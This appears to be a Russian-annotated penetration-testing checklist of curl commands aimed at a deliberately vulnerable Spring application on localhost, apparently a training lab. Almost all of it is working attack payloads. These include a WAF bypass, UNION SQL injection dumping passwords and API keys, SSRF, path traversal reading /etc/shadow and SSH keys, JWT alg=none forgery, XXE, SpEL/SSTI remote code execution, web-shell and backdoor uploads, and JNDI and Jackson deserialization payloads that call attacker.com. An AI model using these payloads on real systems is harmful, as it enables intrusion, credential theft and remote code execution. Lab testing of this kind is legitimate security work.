1. WAF Bypass и SQL Injection

echo "=== 1. WAF BYPASS ТЕСТЫ ==="

# Тест 1: Прямой запрос - WAF должен заблокировать                    +
echo "[TEST] Прямой запрос с SQLi:"
curl -s "http://localhost:8080/api/users/search?name=' OR '1'='1"
# Ожидается: 403 Forbidden (содержит "' or '")         

# Тест 2: Обход через X-Forwarded-For                                +
echo -e "\n[TEST] Обход через X-Forwarded-For:"
curl -s -H "X-Forwarded-For: 127.0.0.1" \
  "http://localhost:8080/api/users/search?name=' OR '1'='1" | jq .


echo -e "\n=== 2. SQL INJECTION АТАКИ ==="

# 1. Все пользователи                               +
echo "[SQLi] Извлечение всех пользователей:"
curl -s -H "X-Forwarded-For: 127.0.0.1" \
  "http://localhost:8080/api/users/search?name=' UNION SELECT '1', username, email, password, 'false' FROM users--" | jq .

# 2. Только админы                                                  +
echo -e "\n[2] Админы:"
curl -s -H "X-Forwarded-For: 127.0.0.1" \
  "http://localhost:8080/api/users/search?name=' UNION SELECT '1', username, email, password, 'true' FROM users WHERE is_admin=true--" | jq .

# 3. API ключи                                                      +
echo -e "\n[3] API ключи:"
curl -s -H "X-Forwarded-For: 127.0.0.1" \
  "http://localhost:8080/api/users/search?name=' UNION SELECT id::text, service_name, api_key, is_active::text, '1' FROM api_keys--" | jq .


-------------------------------

2. SSRF Атаки



echo "=== 3. SSRF АТАКИ ==="

# Доступ к Internal API                                                   +
echo "[SSRF] Доступ к Internal API (все пользователи):"
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://localhost:8081/api/internal/users/all" | jq .



# SSRF с SQLi через Internal api_keys--                                   +
echo -e "\n[SSRF] SSRF + SQLi комбо:"
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://localhost:8081/api/internal/users/search?name=%27%20UNION%20SELECT%20username,%20password,%20email,%20is_admin::text,%20api_key%20FROM%20users--" | jq .




# Чтение локальных файлов                                   +
echo -e "\n[SSRF] Чтение /etc/hostname:"
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=file:///etc/hostname"

  echo -e "\n[SSRF] Чтение /etc/passwd:"                               +
  curl -s -X POST "http://localhost:8080/api/users/import-profile" \
    -d "url=file:///etc/passwd"


# SSRF к Internal API (по-прежнему работает)                        +
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://internal-api:8081/api/internal/users/all"


-------------------------

3. Path Traversal

echo "=== 4. PATH TRAVERSAL ==="

# Чтение системных файлов                     +
echo "[PT] Чтение /etc/passwd:"
curl -s "http://localhost:8080/api/files/read?filename=../../../etc/passwd"

----------------------------

4. JWT Атаки

echo "=== 5. JWT АТАКИ ==="

# Получение легитимного токена                    +
echo "[JWT] Получение токена (слабый пароль):"
TOKEN_RESPONSE=$(curl -s -X POST "http://localhost:8080/api/auth/login" \
  -d "username=admin&password=anything")
echo $TOKEN_RESPONSE | jq .

TOKEN=$(echo $TOKEN_RESPONSE | jq -r '.access_token')
REFRESH=$(echo $TOKEN_RESPONSE | jq -r '.refresh_token')
echo "Token: ${TOKEN:0:50}..."
echo "Refresh: $REFRESH"

# Декодирование токена                                  +       
echo -e "\n[JWT] Декодирование токена:"
curl -s -H "Authorization: Bearer $TOKEN" \
  "http://localhost:8080/api/auth/debug/token-info" | jq .

# Algorithm none attack
echo -e "\n[JWT] Создание токена с alg=none:"
HEADER=$(echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=' | tr '/+' '_-')
PAYLOAD=$(echo -n '{"sub":"superadmin","role":"ROLE_ADMIN","admin":true}' | base64 | tr -d '=' | tr '/+' '_-')
FORGED_TOKEN="${HEADER}.${PAYLOAD}."
echo "Forged: $FORGED_TOKEN"

# Использование поддельного токена                      ?
echo -e "\n[JWT] Использование поддельного токена:"
curl -s -X POST "http://localhost:8080/api/admin/users/create" \
  -H "Authorization: Bearer $FORGED_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"hacker","email":"h@h.com","password":"hack","admin":true}' | jq .

# Генерация произвольного токена через debug endpoint
echo -e "\n[JWT] Генерация кастомного токена:"                                +
curl -s -X POST "http://localhost:8080/api/auth/token/custom" \
  -H "Content-Type: application/json" \
  -d '{"username":"superadmin","role":"ROLE_ADMIN","claims":{"admin":true}}'

# Refresh token подбор
echo -e "\n[JWT] Подбор refresh токенов:"
for rt in "rt_admin_super_secret_2024" "rt_superadmin_2024" "rt_admin_2024"; do
  echo -n "  $rt: "
  curl -s -X POST "http://localhost:8080/api/auth/refresh" \
    -d "refreshToken=$rt" | jq -r '.access_token // "FAILED"' | head -c 30
  echo ""
done




------------------------------

5. Mass Assignment

echo "=== 6. MASS ASSIGNMENT ==="


# Получаем админский токена                                                         +
ADMIN_TOKEN=$(curl -s -X POST "http://localhost:8080/api/auth/login" \
  -d "username=admin&password=anything" | jq -r '.access_token')

# Mass Assignment с админскими правами                                              +
echo -e "\n[MA] Создание админа через Mass Assignment:"
curl -s -X POST "http://localhost:8080/api/admin/users/create" \
  -H "Authorization: Bearer $ADMIN_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"new_admin","email":"new@admin.com","password":"Admin123!","admin":true,"is_admin":true}' | jq .

# Обновление пользователя - повышение привилегий                                    +
echo -e "\n[MA] Повышение john.doe до админа:"
curl -s -X PUT "http://localhost:8080/api/admin/users/2/update" \
  -H "Authorization: Bearer $ADMIN_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"admin":true,"is_admin":true}' | jq .



---------------------------------

6. XXE Атаки

echo "=== 7. XXE АТАКИ ==="

# Чтение файлов через XXE                                   +
echo "[XXE] Чтение /etc/hostname:"
curl -s -X POST "http://localhost:8080/api/xml/import" \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><data>&xxe;</data>'

# XXE + SSRF к Internal api_keys                            +
echo -e "\n[XXE] XXE + SSRF:"
curl -s -X POST "http://localhost:8080/api/xml/import" \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://localhost:8081/api/internal/users/all">]><data>&xxe;</data>'


---------------------------------

7. SpEL Injection и SSTI

echo "=== 8. SpEL/SSTI АТАКИ ==="

# SpEL - System properties                                                +
echo "[SpEL] System properties:"
curl -s -X POST "http://localhost:8080/api/templates/expression" \
  -H "Content-Type: text/plain" \
  -d 'T(java.lang.System).getProperties()'

# SpEL - Environment variables                                              +
echo -e "\n[SpEL] Environment:"
curl -s -X POST "http://localhost:8080/api/templates/expression" \
  -H "Content-Type: text/plain" \
  -d 'T(java.lang.System).getenv()'

# SpEL - Command execution                                                    +
echo -e "\n[SpEL] RCE:"
curl -s -X POST "http://localhost:8080/api/templates/expression" \
  -H "Content-Type: text/plain" \
  -d 'exec:whoami'

# SSTI через templates                                                      +
echo -e "\n[SSTI] Template injection:"
curl -s -X POST "http://localhost:8080/api/templates/render" \
  -H "Content-Type: application/json" \
  -d '{"template":"Hello {{name}}! ENV: ${env:INTERNAL_API_KEY}","variables":{"name":"Hacker"}}'

# SSTI - File read                                                             +
echo -e "\n[SSTI] File read:"
curl -s -X POST "http://localhost:8080/api/templates/render" \
  -H "Content-Type: application/json" \
  -d '{"template":"Config: ${file:/etc/passwd}","variables":{}}'

------------------------------------------


8. Command Injection и Reverse Shell

echo "=== 9. COMMAND INJECTION / RCE ==="

# Web shell                                                                       +
echo "[RCE] Web shell:"
curl -s "http://localhost:8080/api/upload/shell?cmd=id"

# Reverse shell endpoint                                                          +
echo -e "\n[RCE] Command execution:"
curl -s -X POST "http://localhost:8080/api/upload/reverse-shell" \
  -d "command=whoami && ls -la /tmp"

# Internal API command execution                                                  +
echo -e "\n[RCE] Internal command execution:"
curl -s -X POST "http://localhost:8081/api/internal/files/execute-command" \
  -d "cmd=id"

# Internal API file processing                                                    +
echo -e "\n[RCE] Internal file process:"
curl -s -X POST "http://localhost:8081/api/internal/files/process" \
  -H "Content-Type: text/plain" \
  -d "/etc/passwd"



-------------------------------------------

9. GraphQL и JPQL Injection


echo "=== 10. GRAPHQL/JPQL INJECTION ==="


# GraphQL - SQLi через WHERE                                                  + 
echo -e "\n[GraphQL] SQLi:"
curl -s -H "X-Forwarded-For: 127.0.0.1"  -G "http://localhost:8080/api/search/graphql" \
  --data-urlencode "query=users { password, email } where: username='admin' OR '1'='1'"

# JPQL Injection                                                              + 
echo -e "\n[JPQL] Dynamic query:"
curl -s -X POST "http://localhost:8080/api/search/dynamic-query" \
  -H "Content-Type: application/json" \
  -d '{"entity":"User","where":"1=1","limit":10}'

# Criteria API Injection                                                       +
echo -e "\n[Criteria] Advanced search:"
curl -s -X POST "http://localhost:8080/api/search/advanced" \
  -H "Content-Type: application/json" \
  -d '{"filters":{"entity":"User","conditions":[{"field":"username","operator":"contains","value":"admin"}]}}'


-----------------------------------

10. Information Disclosure

echo "=== 11. INFORMATION DISCLOSURE ==="

# Actuator endpoints                                                        +
echo "[INFO] Actuator env:"
curl -s "http://localhost:8080/actuator/env" | jq '.propertySources[] | select(.name=="systemEnvironment") | .properties | keys'

# System info                                                                 + 
echo -e "\n[INFO] System info:"
curl -s "http://localhost:8080/api/health/system" | jq '{hostname, javaVersion, osName, availableProcessors}'

# Environment variables                                                     +
echo -e "\n[INFO] Environment:"
curl -s "http://localhost:8080/api/admin/env" | grep -E "(KEY|SECRET|PASSWORD|TOKEN)"

# Thread dump                                                               + 
echo -e "\n[INFO] Thread dump:"
curl -s "http://localhost:8080/api/health/threads" | jq '.threadCount'


------------------------
DynamicSearchController#advancedSearch (Criteria API Injection)

# Эксплуатация через Public API                                             +
curl -s -X POST "http://localhost:8080/api/search/advanced" \
  -H "Content-Type: application/json" \
  -d '{
    "filters": {
      "entity": "User",
      "conditions": [
        {"field": "username", "operator": "contains", "value": "admin"},
        {"field": "password", "operator": "sql", "value": "substring"}
      ]
    }
  }' | jq .


DynamicSearchController#dynamicQuery (JPQL Injection)

# Извлечение всех пользователей                                                         +
curl -s -X POST "http://localhost:8080/api/search/dynamic-query" \
  -H "Content-Type: application/json" \
  -d '{"entity": "User", "where": "1=1", "limit": 10}' | jq .


InternalController#searchUsers (SQL Injection)

# Через Public API с обходом WAF                                                                +
curl -s -H "X-Forwarded-For: 127.0.0.1" \
  "http://localhost:8080/api/users/search?name=' UNION SELECT '1', username, password, email, CAST(is_admin AS VARCHAR) FROM users--" | jq .


InternalController#getUserByUsername (SQL Injection + Password Disclosure)

# Через SSRF с Public API                                                               +
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://internal-api:8081/api/internal/users/by-username/superadmin" | jq .


InternalController#getTasksByAssignee (SQL Injection)

# Через SSRF                                                                                        +
curl -s -X POST "http://localhost:8080/api/users/import-profile" \
  -d "url=http://internal-api:8081/api/internal/tasks/by-assignee?assignee=admin'%20OR%20'1'='1" | jq .


AdminController#getSystemInfo (Information Disclosure / JNDI Injection)

# Раскрытие всех системных свойств                                                      +
curl -s "http://localhost:8080/api/admin/system/info" | head -50

# Конкретное свойство                                                               +
curl -s "http://localhost:8080/api/admin/system/info?property=java.version"

# Переменные окружения                                                              +
curl -s "http://localhost:8080/api/admin/env" | grep -iE "(key|secret|pass)"

# JNDI Injection                                                                                    нужна проверка
curl -s "http://localhost:8080/api/admin/system/info?property=ldap://attacker.com:1389/Exploit"


 FileController#getFileInfo (Information Disclosure)

# Информация о файлах
curl -s "http://localhost:8080/api/files/info?filepath=/etc/shadow"                             +
curl -s "http://localhost:8080/api/files/info?filepath=/root/.ssh/id_rsa"               // нужно сразу получить всех пользователей, а затем брать ключ


FileController#readResource (Classpath Resource Read)

# Чтение конфигурации из classpath                                                          +
curl -s "http://localhost:8080/api/files/resource?resource=application.yml"


FileUploadController#uploadFile (Unrestricted File Upload)

# Загрузка файла с path traversal в имени                         // нужна проверка с реальным файлом шела и далее его эксплуатацией
curl -s -X POST "http://localhost:8080/api/upload/file" \
  -F "file=@/tmp/shell.jsp;filename=../../../tmp/uploads/shell.jsp"

# Загрузка с произвольным именем                                     // нужна проверка с реальным файлом бэкдора и далее его эксплуатацией
curl -s -X POST "http://localhost:8080/api/upload/file" \
  -F "file=@/tmp/payload.sh" \
  -F "customName=../../../tmp/scripts/backdoor.sh"


FileUploadController#uploadAndExecuteScript (RCE)

# Создание и выполнение скрипта                             // нужна проверка
echo '#!/bin/bash
id
whoami
cat /etc/hostname
env | grep -i key' > /tmp/recon.sh

curl -s -X POST "http://localhost:8080/api/upload/script" \
  -F "script=@/tmp/recon.sh" \
  -F "interpreter=bash"


FileUploadController#uploadAndExecute (File Upload + RCE)

# Загрузка файла и выполнение команды с ним                                                 // нужна проверка
echo '#!/bin/bash
curl -s http://internal-api:8081/api/internal/users/all' > /tmp/exfil.sh

curl -s -X POST "http://localhost:8080/api/upload/upload-and-execute" \
  -F "file=@/tmp/exfil.sh" \
  -F "execCommand=chmod +x {FILE} && bash {FILE}"


HealthCheckController#getSystemInfo (Information Disclosure)

# Детальная информация о системе                                                                +
curl -s "http://localhost:8080/api/health/system" | jq '{
  hostname,
  javaVersion,
  osName,
  osArch,
  availableProcessors,
  totalMemory,
  environmentVariables
}'


HealthCheckController#getDiskInfo (Information Disclosure)

# Информация о дисках и директориях                                                 +
curl -s "http://localhost:8080/api/health/disk" | jq .

SearchController#parseGraphQLQuery (GraphQL Parser Injection)

# Извлечение паролей через GraphQL                                              +
curl -s -G "http://localhost:8080/api/search/graphql" \
  --data-urlencode "query=users { password, email, apiKey, secretNotes } where: is_admin=true"


TemplateController#compileAndRun (Code Injection / RCE)

# Выполнение shell скрипта                                                                      +
curl -s -X POST "http://localhost:8080/api/templates/compile" \
  -H "Content-Type: application/json" \
  -d '{"language":"bash","code":"#!/bin/bash\nid\nwhoami\ncat /etc/hostname"}'

UserController#getUserProfile (IDOR)

# Доступ к чужим профилям                                                       +
curl -s "http://localhost:8080/api/users/profile/1" | jq .
curl -s "http://localhost:8080/api/users/profile/4" | jq .  # superadmin


UserController#updateProfileXml (XXE)

# XXE через XML                                                                     +
curl -s -X POST "http://localhost:8080/api/users/update-profile" \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><profile>&xxe;</profile>'

# XXE + SSRF                                                                            +
curl -s -X POST "http://localhost:8080/api/users/update-profile" \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-api:8081/api/internal/users/all">]><profile>&xxe;</profile>'

UserController#deserializeJson (Jackson Deserialization)

# Jackson polymorphic deserialization                                               // нужна проверка с реальным файлом
curl -s -X POST "http://localhost:8080/api/users/deserialize-json" \
  -H "Content-Type: application/json" \
  -d '["org.springframework.context.support.ClassPathXmlApplicationContext", "http://attacker.com/exploit.xml"]'

















